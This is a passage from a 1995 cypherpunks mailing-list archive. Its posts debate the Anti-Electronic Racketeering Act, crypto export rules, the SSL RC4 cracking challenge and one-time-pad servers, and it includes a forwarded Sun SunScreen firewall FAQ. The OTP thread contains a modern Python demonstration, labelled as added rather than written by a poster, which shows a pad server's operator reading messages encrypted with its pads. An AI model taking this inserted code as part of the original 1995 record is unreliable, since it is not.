and drug pushers on the net?  Certainly, I see no drugs.com site... web, 
ftp, email, usenet or otherwise.

> << I haven't heard much to suggest that McVeigh was using a
> << computer for anything, but we all saw this line coming, right ?
> << 3 of Tim's 4 Horsemen of the Infocalypse figure prominently here; I guess
> << Exon & Gorton have ridden off after the fourth already....

Ditto above.

> Computer fraud accounts for the loss of millions of dollars per year. And
> often times, there is little that can be done about this because the computer
> used to commit the crimes is located overseas. So, under my bill, overseas
> computer users who employ their computers to commit fraud in the United
> States would be fully subject to the Federal criminal laws. 

Yeah, so, why blame citizen units in the USA for actions outsiders 
committed?  Why limit the spread and use of cryptographically strong 
tools from being developed in the USA?

If Joe Badguysky breaks into your house and steals your copy of PGP, then 
exports it to his fatherland, should I arrest you for that?  What if he 
breaks into your store and steals a copy off the shelf and exports it?  

Why punish the victim?

> It is not enough to simply modernize the Criminal Code. We also
> have to reconsider many of the difficult procedural burdens that prosecutors
> must overcome. For instance, in the typical case, prosecutors must identify a
> location in order to get a wiretapping order. But in cyberspace, it is often
> impossible to determine the location. And so my bill corrects that so that if
> prosecutors cannot, with the exercise of effort, give the court a location, then
> those prosecutors can still get a wiretapping order. 

Oh, the poor poor LEA's.  If they can't prove you're guilty (because you 
aren't, and there is no proof because you aren't,) let them throw you in 
jail anyway.

> << All together now: "TRUST US"
> 
> Mr. President, this brave new world of electronic communications and global
> computer networks holds much promise. But like almost anything, there is the
> potential for abuse and harm. That is why I urge my colleagues to support
> this bill and that is why I urge industry to support this bill.

And this type of bill is where the potential for abuse and harm arises.  
The harm of course is to those who will be thrown in jail for wanting 
privacy.

> On a final note, I would say that we should not be too scared of
> technology. 

Gee, who is scared?  Don't be scared, be Big Brother. :-(

> After all, we are still just people and right is still right and
> wrong is still wrong. Some things change and some things do not. 

Circular reasonings and politician's spewing?  I can see the masses 
applauding this... all wearing PJ's and bearing shaved heads watching Big 
Brother on the screen in front of them...

> All that
> my bill does is say you can't use computers to steal, to threaten others or
> conceal criminal conduct.
> 
> << Ah, if that's all it does, why not scrap the whole thing and not waste
> << the Senate's valuable time ?  After all, stealing, threatening, and
> << concealing criminal conduct are already outlawed....

So, what countries are left free of encryption regulations? (English 
speaking preferred, with affordable net access.)  Time to see about 
getting a new passport...


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 14:02:38 PDT
To: cypherpunks@toad.com
Subject: HR361
Message-ID: <9507132102.AA13309@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone previously noted that HR361, the omnibus export
administration act, would require the administration to assess the
impact of the current crypto export controls on the software industry?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 13 Jul 95 15:26:31 PDT
To: cypherpunks@toad.com
Subject: The Anti-Racketeering fiasco meets Mozilla
Message-ID: <0gDoBDvcwapi@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I was just talking with a friend, and had the most vile thought.

Mallet works part time for the Justice Department.  His job is
entrapment of random individuals.  He has a Web server running the
Netscape Commerce Server.

When a potential victim is lured into looking at Mallet's home page with
Mozilla, the poor sap is rewarded by a server-side push of some small
piece of contraband software.  Many victims will simply move off the
page, forgetting that the document is now in their Netscape cache.
They're toast.  Others might clear their cache, but the server still
shows that the file was sent.  They're now guilty of both receiving and
concealing contraband.  And maybe destruction of evidence and/or
interfering with law enforcement.

I'm only raving like this because the whole Anti-Racketeering bill has
me both scared and really pissed off.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAWbGBvikii9febJAQExKgP9HApgUEHkIaABuiQ/Lx4jfcfG6WUT7r6U
TgiQ83+yvYBt2EeWIlF3uqUN4PEO8cLYsDjthpesI8nDV2HpjTCbiZ0g+zGJlOmi
ps8vfRRK0A8elyCkTy2b4NlwR4Kre6iqYJfr9+ZA1rW019ZfvullZw9TAPDrhfLj
cP780NHfhn4=
=sRJY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 15:10:28 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <v02120d19ac2aa1f17f4f@[199.2.22.120]>
Message-ID: <Pine.ULT.3.91.950713170704.14454B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Douglas Barnes wrote:

> Since the Anti-Electronic Racketeering Act of 1995 might as well
> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
> Tim throw in the towel already, when the bill hasn't even made it
> through committee yet.

I don't think Tim threw in the towel on this bill, but has come to 
realize that the overall war on privacy cannot be won by concentrating on 
the individual battles.  We've ALL got to take a deep breath and come up 
with a different plan of attack; a plan that the TLAs and spooks will be 
unable to defend against.  Right now, as long as we're kept busy with 
individual bills and initiatives, they have us just where they want us.


____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: truher@mojones.com (Joel B. Truher)
Date: Thu, 13 Jul 95 19:38:26 PDT
To: beta-testers@mojones.mojones.com
Subject: The MoJo Wire thanks you
Message-ID: <v02120d0eac2b65b1c651@[204.188.118.233]>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for your help in our beta test!  Please come back soon,
and send me mail if you'd like to be removed from this mailing
list -- we may send a new Web product announcement every few months,
and you'll soon receive a survey of your opinion of our site.

More info on The MoJo Wire:


             "More fun than a secret decoder ring!"
                               -- Jim Hightower

  "Mother Jones magazine is turning the tables [on Gingrich]"
                               -- LA Times

Mother Jones is pleased to announce the official release of our
redesigned WWW site, now called The MoJo Wire, on July 14th, at:

                    http://motherjones.com

* See Newt Gingrich's secret list of major funders on our "Coin-
  Operated Congress" feature.  Gingrich is fighting the FEC in
  court to keep this information secret, but you can see it here
  for the first time.  See the ten worst, the ten richest, the
  dirt on all of them, and help complete this interactive
  investigation project.

* Newly revamped on-line chat software, called Live Wire,
  provides the best Web-based political discussions anywhere.
  Create hyperlinks in the words of others in this new feature,
  which already contains several lively debates.

* The July/August issue of Mother Jones magazine is available
  only on The MoJo Wire.  Read the full text of the magazine.

Many thanks to our team of two thousand beta testers!  With your
help, we've worked a few of the last kinks out of the system,
added a few things, and now offer the service password-free.

For more information about The MoJo Wire, send mail to
truher@mojones.com, or call me at 415-665-6637.

Joel Truher
Manager, The MoJo Wire






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Thu, 13 Jul 95 14:25:50 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: laws....
In-Reply-To: <9507131959.AA12939@snark.imsi.com>
Message-ID: <Pine.3.89.9507131752.D28886-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



	Yeah I know what you mean. Like, it's gonna be, bust down your 
fuckin' door and some goon's gonna go, do you have a floppy disk in here?

			Lee.

On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> 
> By the way, I'm really sick of the naming schemes on these laws. It's
> only a matter of time before some 1984ish wag creates the "Omnibus
> Universal Love and Happiness Act of 1998" providing the death penalty
> for possessing trace quantities of marijuana or some such. The
> Orwellian names on some of these bills are simply astounding.
> 
> Perry
> 

------------------------------------------------------------------------------
			     R. Leland Lehrman
			Phone: (203) 777-1827
	  God, Art, Technology and Ecology Research and Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "It's supposed to crash like that." <gorkab@sanchez.com>
Date: Thu, 13 Jul 95 14:40:22 PDT
To: cypherpunks@toad.com
Subject: Encryption and ITAR
Message-ID: <009934CEC4F49140.000004E7@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know how far ITAR reaches?  Is there a list of programs that are illegal
to take from America anywhere else?  My company does a LOT of business (80%)
outside the US, and I wonder if they are maybe pissing off the NSA or something
with some software they take with them.  (a DES encrypter, and some other
encryption stuff)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Thu, 13 Jul 95 14:35:38 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Mr. Newbie...
In-Reply-To: <Pine.SOL.3.91.950713160218.27008G-100000@use.usit.net>
Message-ID: <Pine.3.89.9507131729.E28886-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



	Okay folks, here comes Mr. Newbie.

	Duh...How can I figure out how to use pgp. Is there a good place 
to learn the background and basics in a step-by-step easy to understand 
way? Duh... I think I wanna know...

------------------------------------------------------------------------------
			     R. Leland Lehrman
			Phone: (203) 777-1827
	  God, Art, Technology and Ecology Research and Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: waynec@csr.UVic.CA (Wayne  Chapeskie)
Date: Thu, 13 Jul 95 17:38:13 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <199507140038.RAA20869@clipper.csc.UVic.CA>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Jul 13, 11:10am, Timothy C. May wrote:
>
>Every couple of months there's been a new legislative attack on what were
>once basic American freedoms. (Sorry to focus on America. I'm sure you
>folks in the liberty-loving paradises of, say, Germany, are gloating over
>our hand-wringing.)
>
>We're losing the war. We can send in donations to the NRA and EFF, offer
>our support to the ACLU and EPIC, but the tide just keeps rolling in,
>washing away our efforts. The full-time lawmakers in D.C. can proliferate
>new repressive laws much faster than we can fight them.

The current legislative situation regarding computer encryption and
communication technologies is one that firearms owners in the
US and other places have for many years been familiar with.
Every congressional session, a US Representative introduces a bill to
repeal the Second Amendment.  Almost every session, a bill to
prohibit handguns is introduced.  Every session, nearly a dozen or
more bills are introduced which infringe in some way on the rights of
Americans to own and use firearms, through registration, taxation of
ammunition and firearms, licensing of owners, restrictions on imports,
restrictions on dealers, bans of certain types of ammunition, and on
and on and on.

As the NRA might say:  Welcome to the party.  Get used to the heat,
because it isn't going to get any better.

As computer people, we have for some decades now been able to carry
on with our activities essentially unnoticed by the people
Perry Metzger has quite precisely referred to as fascists.

No longer.

Fortunately, most bills introduced into the US congress die without
becoming law.  This is the nature of the US legislative process.
This has included most (but not all) anti-gun rights bills, and will
likely include most anti-crypto and anti-free-speech bills as well.
(As was pointed out, this particular bill has no co-sponsors, and
is unlikely to proceed out of committee).

Unfortunately, proponents of secure and private communications, as
well as proponents of free speech over computer communications
networks, are likely to find themselves under constant legislative
and executive attack for the foreseeable future, just as American
gun owners have been.

Wayne Chapeskie

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMAW8PgB/BYFE8GeZAQHDOwP+Ohzckk5GVkpw29WMzZcaTuCLeYJUrLfi
6HVkFvQsLOOCLKXAnqWyVxxLjUAlEPLs4waVTEgj2zntX3K/zeyejTSFgbM4ITPK
V4UOpTif6WMoZBqossxzNQT+JJDpNC6+b2QmuXIzeC60UO4LbU5OmSRXcQ0uCdbt
z1FSZTt/ol0=
=VAPu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan Shekter" <jshekter@alias.com>
Date: Thu, 13 Jul 95 14:46:17 PDT
To: cypherpunks@toad.com
Subject: Re: SSL RC4 challenge
Message-ID: <9507131745.ZM12634@lennon.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


Quoth tedwards@src.umd.edu:
>On Wed, 12 Jul 1995, alex wrote:
>> Can't we hold off a few weeks on this, so that we can all short the stock
>> once it's been offered? <g>
>
>Hmm...well, considering we have yet to break the first 40-bit RC4 key
>(with 87.1 of the keyspace searched), I think it might be a bit early to
>make financial decisions based on our cracking abilities.


	Yes, but it is highly unlikely we have a valid plaintext/cyphertext
pair. Since the format of SSL is known precisely, we won't have this problem.

	But, yes, let's break the example SSL transaction first.

	- Jonathan

-- 
    ____________________________________________________
   /   Jonathan Shekter   /                            /
  /   Graphics Hack      /   "Probability alone       /
 /  Alias/Wavefront     /   dictates that I exist"   /
/______________________/____________________________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Thu, 13 Jul 95 14:56:14 PDT
To: cypherpunks@toad.com
Subject: private idaho
Message-ID: <199507132155.RAA15645@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to run Private Idaho. I tried the 2.1 version as well as the new
beta version. I have all the files in the same directory as PGP. When I
create a message and select clear sign it spawns a dos box that is all black
with the cursor in the top left corner. If I hit return it closes the box
and gives the following message:

File not found in the sign routine, couldn't create output file.

Any ideas on what might cause this or pointers to additional information
would be welcome.
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 15:06:53 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <Pine.SUN.3.91.950713175807.25319A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Ray Arachelian wrote:

> So, what countries are left free of encryption regulations? (English 
> speaking preferred, with affordable net access.)  Time to see about 
> getting a new passport...

How about "not respecting international copyright law, and not having 
extradition treaties with the US" ... set up a data haven, we now know 
why we need it soon... charge by the Kbyte, automate the billing, and relax.

Anybody seriously interested? 
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 15:17:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net>
Message-ID: <9507132217.AA10568@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
[some dense, ambiguous prose]

Jim writes:
> Pardon me if I misunderstood your point.  I haven't read the whole
> bill, but I read the "regardless" phrase with a different emphasis. 
> In short, that language appears to mean that one could be pounded with
> RICO for uploading crypto software even if the crypto is EXPORTABLE.
> 
> The part about subsequent instances of actual access to non-exportable
> crypto by foreigners, etc. appears to address a different situation --
> the situation where the crypto is non-exportable.
[...]

That's exactly my reading of both parts, more lucidly expressed, so I
guess my point wasn't clear before :)

> It is unclear, not having read the entire bill, whether the onerous
> provision in the case of non-exportable crypto would apply in the case
> of exportable crypto.  

Right -- that's the possible ambiguity I was trying to bring out. 

> This email is academic speculation.  This email is not legal advice,
> is not a consultation with counsel, and does not create an attorney-
> client relationship.  (As a condition of entering into an attorney-
> client relationship, I require a formal, ink-signed fee agreement.)

(Ditto, except that I require some years of law school too ;)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 16:32:21 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: On a lighter note...
Message-ID: <Pine.ULT.3.91.950713183010.16887D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, for all those that are looking for something a little lighter after 
today's activity, the new version of the Geek Code (version 3.0) was 
released this morning.

You can find it via your favorite web browser at:
	http://krypton.mankato.msus.edu/~hayden/geek.html

Or finger me for info on how to get it in ASCII version.

Comments appreciated.  I know the revamped political sections aren't 
perfect, but they are a little better.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Thu, 13 Jul 95 17:45:41 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: OTP server..
In-Reply-To: <v02130500ac2cc7c4390a@[205.219.167.38]>
Message-ID: <Pine.3.89.9507131817.A10819-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Black Unicorn wrote:

> >How about WWW one time pad servers? You browse to your
> >favorite OTP server, which has a random number generator
> >running in the background. You tell it to give you a block
> >of X bytes, and mail it to persons 1, 2, 3, ... N.
> 
> I think you're trusting the server a GREAT deal.

Why is that?  The randomness of the data can be easily checked...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 13 Jul 95 16:46:51 PDT
To: cypherpunks@toad.com
Subject: OTP server..
Message-ID: <199507132346.SAA07316@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



How about WWW one time pad servers? You browse to your
favorite OTP server, which has a random number generator
running in the background. You tell it to give you a block
of X bytes, and mail it to persons 1, 2, 3, ... N.

These people then use this OTP for encrypting a document.
It wouldn't be illegal because you aren't encoding any data
and distributing it.. You're generating raw data. You wouldn't
have to distribute any crypto software, you just xor your
data file with the number of bytes that you were sent
in the mail from the OTP server.. Enough of these things
would be REALLY tough to monitor.. Plus, you could connect
8 different times and just pick one of the sets.. Or you
could just use a portion of the set that you and the receiving
party agreed upon.

Or, instead of using email, you could have an application/x-otp
browser that would collect the OTP that the server sent out
to you over HTTP. (this would be really hard to differentiate
from other data if the server was doing other things at the
same time).

Thoughts?

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University
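
An added illustration of the trust question raised in this thread (the objection that the scheme trusts the server a great deal, and the reply that randomness can be checked); it is not code from any poster. The pad server, its secret seed and the sample message are constructed assumptions: the sketch shows pads that pass bit-balance and chi-square checks while the operator, who can regenerate every pad issued, still reads a message encrypted with one of eight pads.

```python
import hashlib
import math


def expand(seed: bytes, n: int) -> bytes:
    """Deterministically stretch a seed to n bytes (SHA-256 in counter mode)."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:n])


def issue_pads(server_secret: bytes, count: int, n: int) -> list:
    """Hypothetical pad server: connection i receives its own n-byte pad.
    Assumption: the operator keeps server_secret (or simply logs the pads)."""
    return [expand(server_secret + b"/pad/" + str(i).encode(), n)
            for i in range(count)]


def xor(data: bytes, pad: bytes) -> bytes:
    """One-time-pad encryption and decryption are the same XOR."""
    if len(pad) < len(data):
        raise ValueError("pad shorter than message")
    return bytes(d ^ p for d, p in zip(data, pad))


def looks_random(pad: bytes) -> bool:
    """Recipient-side checks: bit balance and byte-frequency chi-square."""
    nbits = len(pad) * 8
    ones = sum(bin(b).count("1") for b in pad)
    z = abs(ones - nbits / 2) / math.sqrt(nbits / 4)
    counts = [0] * 256
    for b in pad:
        counts[b] += 1
    expected = len(pad) / 256
    chi2 = sum((c - expected) ** 2 / expected for c in counts)
    # 255 degrees of freedom: mean 255, standard deviation about 22.6.
    return z < 5.0 and 150.0 < chi2 < 400.0


def is_printable(text: bytes) -> bool:
    return all(32 <= b < 127 for b in text)


def server_recover(ciphertext: bytes, server_secret: bytes, count: int):
    """Operator's view: regenerate each issued pad and keep the one that
    yields readable text. Picking 1 of 8 pads adds only 3 bits of work."""
    pads = issue_pads(server_secret, count, len(ciphertext))
    for i, pad in enumerate(pads):
        candidate = xor(ciphertext, pad)
        if is_printable(candidate):
            return i, candidate
    return None


if __name__ == "__main__":
    secret = b"constructed-server-secret"        # constructed sample value
    pads = issue_pads(secret, 8, 65536)          # user connects 8 times
    print("all pads pass the checks:", all(looks_random(p) for p in pads))
    message = b"Meet at the usual place at noon, bring the keys."
    ciphertext = xor(message, pads[5])           # user secretly picks pad 5
    print("operator recovers:", server_recover(ciphertext, secret, 8))
```

The statistical checks measure the distribution of the pad bytes, not who else holds a copy of them.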



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 13 Jul 95 18:47:40 PDT
To: cypherpunks@toad.com, gnu
Subject: SunFlash 79.05: SunScreen and Java Questions & Answers
Message-ID: <9507140147.AA13138@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note the export related stuff, and the 40-bit RC2 & RC4.  But also note
"An International version will be available early in 1996".    --gnu]

==============================================================================
SunFlash 79.05

                 SunScreen and Java Questions & Answers

July  1995         John J. McLaughlin, Editor/Publisher    flash@flashback.com
==============================================================================

     SunScreen is a Product Line comprised of enabling products/solutions
     for doing business transactions on the Internet and other public
     networks. The first product offering in the SunScreen Product Line is
     the SPF-100, a completely new network security device. SPF-100 is a
     dedicated, turnkey solution designed to be network undetectable.
     Shipped pre-configured, SPF-100 is based on state-of-the-art packet
     screening integrated with encryption to provide private and
     authenticated communications on public networks.

     Several questions about the Java language and the HotJava browser are
     also addressed.

-------------------------------------------------------------------------------

The SunScreen sits on network boundaries, either between two LAN's or
between a LAN and a WAN. It can be used to achieve compartmentalization
within internal networks or to use the Internet or other public
networks as a virtual, secure, private network (VSPN).

The SPF-100 is being targeted towards enterprise customers who require
the highest levels of network security and guaranteed privacy. The
market segments who have expressed the most interest in the SunScreen
SPF-100 include Telecommunications, Finance, Health Care and the
Government.

Due to restrictions imposed on the export of encryption products, the
SunScreen SPF-100 will initially be released only in the U.S.A. and
Canada. An International version of the product is scheduled for early
1996.

What does SunScreen look like?

The SunScreen consists of two physical components: SPF-100, the
security gateway product is based on a headless SPARC-based system
running an embedded OS and shipped standard with five ethernet ports
(one on-board and four through a Quad Ethernet Card). Four of the ports
are used for screening packets and have no IP address. Since the
embedded OS does not include any user programs, network services, etc.,
it cannot be logged into, nor can any applications be run on it.

The SPF-100 is managed by the SunScreen Administration Station, an
Intel 486-based system running MS-DOS and Windows 3.1. Multiple
SPF-100's may be remotely managed by a single SunScreen Administration
Station, or a single SPF-100 can be managed by multiple SunScreen
Administration Stations. The SPF-100 uses the fifth ethernet port to
establish an encrypted connection to the SunScreen Administration
Station. The SunScreen Administration Station is the only device that
can be used for monitoring, configuring and managing the SPF-100.

A SunScreen is set up to be the point of contact between two
administrative domains such as a private and a public network. Two or
more of the Quad Ethernet ports can be used to bridge the private and
public sides. The on-board Lance Ethernet interface links the SPF-100
to the SunScreen Administration Station through an authenticated and
encrypted connection.

Functionally, the SPF-100 includes an IP level packet screen and a
facility to encrypt and decrypt data transmissions. The SPF-100 packet
screen software runs as an integral part of the SunScreen operating
environment. It tracks the state of session oriented packet
transactions (e.g. TCP) as well as sessionless packet transactions
(e.g., UDP). Maintaining state allows the SunScreen to provide
additional protection from connection stealing.

Effectively, the SPF-100 is invisible to any network entity other than
certified Administration Stations. Interfaces that participate in the
packet screening activity have no IP address and do not respond to any
network probing; they simply pass packets on to the screen.

Using the SunScreen Administrative GUI, an administrator can specify
packet screening rules, specify encryption/decryption criteria,
configure and implement a security policy and monitor the SPF-100
actions on incident network traffic. All transactions between
associated Administrative Stations and SPF-100's are encrypted, adding
security to administrative activity.

What is a packet screen? How is a SunScreen packet screen set up?

A packet screen is a software filter that is imposed on a network data
packet as it passes from a public network to a private network. A
packet screen acts on a data packet according to a set of rules.
Generally speaking, rules are used to discriminate certain packets and
to initiate certain actions on those packets.

SunScreen packet screens are specified by an administrator at the
Administration Station. A packet screen rule is defined by the contents
of three discriminator fields and two actor fields. Two of the
discriminator fields are the packet source and destination address.
These may be addresses of networks, subnets, hosts, or groups of hosts.
The third discriminator field identifies the packet's Internet service
type, e.g. telnet or ftp. This really equates to a socket port number,
so privately defined services can be discriminated as well. SunScreen
also does port coloring to ensure that the source address is consistent
with the ethernet interface.

The two actor fields determine what action is taken if the
discriminating conditions select an incoming packet. One actor simply
determines if the packet passes or fails. The other determines what
explicit action the packet triggers.

An example of a rule would be to discriminate any packet originating at
IP address 192.9.185.28, heading for IP address 129.146.10.14, and
using the telnet service. Any packet that meets these criteria is
allowed to pass through the screen but it is logged as an event.

In SunScreen, the default screening rule is to fail any packet that is
not explicitly allowed to pass.

What encryption alternatives are available in SunScreen?

SunScreen uses a combination of shared key and public key encryption to
provide data privacy and authentication. Privacy means that only the
intended recipient will be able to decipher the message; authentication
means that there is a high level of confidence that the identity of the
message originator is valid and that the message has not been modified
in transmission.

The following encryption software is available on SunScreen:

    shared key: 40-bit RC2 and RC4, 56-bit DES
    public key: 1024-bit RSA, 1024-bit Diffie-Hellman

Shared key encryption and public key encryption both have advantages
and disadvantages. Shared key encryption is desirable because it
ensures confidence in privacy and yet is moderate in its demands for
processing power during data transformation. It is flawed because both
sender and recipient need access to the same key; having to distribute
a key compromises its secrecy.

In public key encryption, two keys are used - a private key and a
public key.  The two keys are generated in the same operation. One key
can be thought of as the inverse of the other, though there is no
obvious relationship between the two. Any data stream that is encrypted
using one key can be decrypted by the other, but only by the other. The
owner of the private key can distribute the public key at will, but
need never (and should never) distribute the private key. Therefore,
public key encryption solves the twin problems of privacy and
authentication.

Consider the case of a holder of a public key encrypting a message to
be sent to the owner of its private pair. This is a private
transmission because nobody but the private key owner can decrypt the
message. Now consider the case of the owner of the private key
sending an encrypted message to a public key pair holder. If this
message decrypts successfully, then it must have come from the private
key owner. It is authenticated. A minor disadvantage to public key
encryption is that each originator needs his own private key and
multiple public keys in order to exchange private messages. A major
disadvantage is that public key cryptography demands a lot of
processing power during data transformations.

SunScreen combines these methods to assure private and authenticated
message transmission across public networks at reasonable performance.

Why was a PC chosen as the Administration Station platform?

From a marketing perspective, since SunScreen is targeted towards all
customers, not just current Sun customers, it was felt that "a black
box controlled by a PC running Windows" would be easier to explain and
sell and would not require a detailed discussion of UNIX. Additionally,
since the Administration Station is required to be a dedicated system,
it was felt that customers would be more receptive to a lower cost
machine such as a PC, being a dedicated, single-purpose-only system.
Finally, ICG will be offering an end-user solution and due to its
popularity considered the PC a good end-user prototype. A SPARC-based
desktop Administration Station is under consideration.

What is Sun ICG?

ICG is the Internet Commerce Group, a Sun business whose charter is to
produce enabling technologies and solutions for doing business over the
Internet and other public networks. ICG will be developing the
SunScreen Product Line, and its first product offering is the SPF-100.

What is packet tunneling?

Packet tunneling refers to the capability of encapsulating one packet
in another packet. Together with encryption, tunneling provides data
privacy as well as network topology hiding. Network packets traveling
between two private networks are encrypted and encapsulated in a
wrapper packet at the exit point of one network and unwrapped and
decrypted at the entry point of the other and then passed along to
their destination host.

What is packet vectoring?

Packet vectoring is a capability which enables a packet to be "copied"
and diverted to other areas in addition to its intended route, for
further processing. Packet vectoring enables distributed processing of
packet streams for billing, metering, auditing and intrusion detection
purposes. SunScreen includes the capability to do packet vectoring but
currently does not have an application which would enable it to be used
by customers.

What is SKIP?

SKIP, an acronym for Simple Key Management Internet Protocol, provides
a simple means of secure communications between two SunScreens across
the Internet. SKIP was invented by Ashar Aziz of Sun Microsystems, Inc.
and is currently being considered by the Internet Engineering Task
Force (IETF) as an Internet service standard. It is a sessionless
service that acts as the entry and exit point for secure communications
between two private networks.

When invoked as a service, SKIP encrypts a client packet stream as
described above. Using packet tunneling, client source and destination
encrypted, hiding private network topologies from the public. This
encrypted packet stream is then forwarded to the destination network,
where it is decrypted by another SunScreen supporting the SKIP service.
Once inside the destination private network, the packet stream
continues on its way to the destination host.  Details on the SKIP
specification can be found at http://skip.incog.com/

Does SunScreen support application relays?

SunScreen does not support application relays. There is no way to load
applications on the SPF-100 embedded operating system. However
SunScreen application relays are legitimate, useful adjuncts to a
secure network. They can easily be integrated into a network access
barrier created by a SunScreen.  One or more of the Quad Ethernet
interfaces on the SunScreen can be dedicated to a network supporting
systems with application relays. Using the SunScreen packet filtering
feature, packets appropriate for an application relay would be directed
to the host running that application relay, returned to the SunScreen,
and passed on (or failed) to their destination.

What products compete with SunScreen?

SunScreen is a high-end network security solution. It is unique not
